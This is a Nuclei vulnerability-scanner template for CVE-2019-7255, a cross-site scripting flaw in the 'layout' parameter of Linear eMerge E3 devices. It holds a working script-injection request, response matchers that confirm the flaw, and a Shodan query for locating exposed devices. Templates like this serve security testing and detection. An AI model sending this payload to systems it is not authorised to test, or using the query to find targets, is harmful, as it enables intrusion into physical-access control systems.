nuclei-templates/cves/2019/CVE-2019-7255.yaml

46 lines
1.2 KiB
YAML

id: CVE-2019-7255
info:
name: Linear eMerge E3 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
reference:
- https://www.applied-risk.com/resources/ar-2019-005
- https://applied-risk.com/labs/advisories
- https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-7255
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-7255
cwe-id: CWE-79
metadata:
shodan-query: http.title:"eMerge"
verified: "true"
tags: emerge,xss,packetstorm,cve,cve2019,nortek
requests:
- method: GET
path:
- "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Template : <script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by cs on 2022/09/08